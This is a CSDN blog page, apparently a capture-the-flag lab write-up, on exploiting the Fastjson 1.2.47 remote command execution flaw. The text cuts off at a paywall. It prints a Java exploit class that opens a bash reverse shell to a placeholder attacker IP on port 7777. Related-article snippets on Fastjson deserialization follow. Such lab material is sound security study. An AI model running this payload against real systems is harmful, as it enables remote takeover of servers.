【漏洞靶场】--Fastjson 1.2.47 远程命令执行漏洞

最新推荐文章于 2024-05-01 11:30:00 发布
最新推荐文章于 2024-05-01 11:30:00 发布
阅读量361 收藏
点赞数
分类专栏: BMZCTF 文章标签: 安全 java linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41152432/article/details/122346154
版权

漏洞环境

在这里插入图片描述

exp准备

将如下Java代码编译成class字节码。

import java.io.BufferedReader;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
 
public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/7777;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
 
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson反序列化漏洞分析
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
java执行脚本语言demo
Coder_android
11-11 1029
public class Test { /** * @param args * @throws IOException  */ public static void main(String[] args) throws IOException { // TODO Auto-generated method stub Process  process = Runtime.get
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1408
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程。
渗透测试练习靶场汇总
最新发布
wangluoanquan111的博客
05-01 1059
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //接下来我将给各位同学划分一张学习计划表!
Fastjson反序列化漏洞详解
zhuyi666的博客
03-13 3005
fastjson介绍:fastjson 是一个java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse 的性能提升到了极致。FastJson是啊里巴巴的的开源库,用与对JSON格式的数据进行解析和打包。速度快使用广泛测试完备使用简单功能完备JSON数据格式{"name":zy, "age":22, "flag":true, "gender":male, "address":cs}("key":value)
Fastjson反序列化漏洞
mingyqf的博客
12-03 423
原文链接:https://blog.csdn.net/Curry197/article/details/125090159Curry197 已于 2022-06-01 21:22:57 修改 2786 收藏 2 分类专栏: 漏洞复现 文章标签: 安全 web安全 网络 版权 漏洞复现 专栏收录该内容 2 篇文章 0 订阅 订阅专栏参考链接:fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)_GeekCoderBrick的博客-CSDN博客_fastjson反序列化漏洞
使用Java脚本引擎执行javascript代码示例
bboy枫亭的博客
09-28 556
JAVA脚本引擎是从JDK6.0之后添加的新功能。 • 脚本引擎介绍: – 使得 Java 应用程序可以通过一套固定的接口与各种脚本引擎交互,从 而达到在 Java 平台上调用各种脚本语言的目的。 – Java 脚本 API 是连通 Java 平台和脚本语言的桥梁。 – 可以把一些复杂异变的业务逻辑交给脚本语言处理,这又大大提高了 开发效率。 • 获得脚本引擎对象 //获得脚本引擎对象 ScriptEngineManager sem = new ScriptEngineManager(); ScriptEn
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
Fastjson 1.2.47 远程代码执行漏洞详解及修复策略》 Fastjson,一个由阿里巴巴开发的高性能、轻量级的Java语言JSON处理库,因其高效的解析速度和广泛的功能,在国内的互联网行业中被广泛应用。然而,任何优秀的...
fastjson 1.2.47漏洞复现实战(vulfocus在线靶场CNVD-2017-02833)——关注紫灵小姐姐不踩坑】
weixin_40416851的博客
08-28 941
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。...............
java调用脚本语言笔记(jython,jruby,groovy)
07-29
NULL 博文链接:https://yinxvxv.iteye.com/blog/811328
漏洞复现系列--fastjson<=1.2.47反序列化漏洞
梦之旅行地
07-27 2121
1.利用条件 fastjson <= 1.2.47 2.复现环境 靶机:vulhub靶场 攻击环境:一台公网vps,本地burp发送攻击数据包 3.具体步骤 1)docker起靶场 进入到vulhub靶场1.2.47-rce目录环境下 cd 1.2.47-rce docker-compose up -d 浏览器访问靶场环境如下 2)反弹shell命令制作 https://krober.biz/misc/reverse_shell.php?ip=122.51.255.154&port=94
java 手机脚本_autoA开源(用java写安卓无障碍脚本)
weixin_39574065的博客
02-23 2167
类ScreenLib类 封装了模糊找色,屏幕点击,屏幕滑动等方法。TsFrame抽象类 封装了脚本的逻辑流程(帮助你快速开发脚本)Fa和Fb 都是继承自F,他们大部分方法都是一样的。重新封装了屏幕点击和模糊找色的方法给TsFrame.继承关系:ScreenLib → F → Fa(Fb同此)怎么创建一个游戏脚本?创建一个class继承TsFrame重写getFa和getFb方法即可。示例代码:pu...
java可以做安卓脚本吗?_一些快速提高Android开发的脚本与技巧
weixin_29081163的博客
02-25 907
正所谓“工欲善其事必先利其器”,一个好的工具或者技巧能让提升工作效率,起到事半功倍的效果。在这里斗胆列出一些窃以为一些可能快速提高Android日常开发的脚本,希望可以为大家提供一些好的工具,有帮助的思路。打印Debug日志信息该脚本打印了包含崩溃,异常,dalvikvm信息,严格模式和网页CONSOLE等信息。[代码]java代码:123456789#!/bin/sh#Explanations:...
java 反显_java反序列化的恶意类回显实验
weixin_33102135的博客
03-07 473
//希望自己能持续的坚持学java因为看书学java有点枯燥,虽然我没搞清楚状况,但是还是希望做个实验。以下是实验记录。前提条件准备一个 漏洞环境,比如vulhub里的fastjson开始实验vulhub 里的readme里的payload类似以下{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{...
fastjson反序列化分析
hongduilanjun的博客
03-16 2585
1.fastjson简单使用 User: package com.naihe; public class User { private String name; private int age; public User() {} public User(String name, int age) { this.name = name; this.age = age; } public String getName
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349)
00勇士王子的博客
03-22 5706
前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞
fastjson1.2.47漏洞复现
07-27
- *1* *3* [Fastjson命令执行漏洞复现(1.2.471.2.24)](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值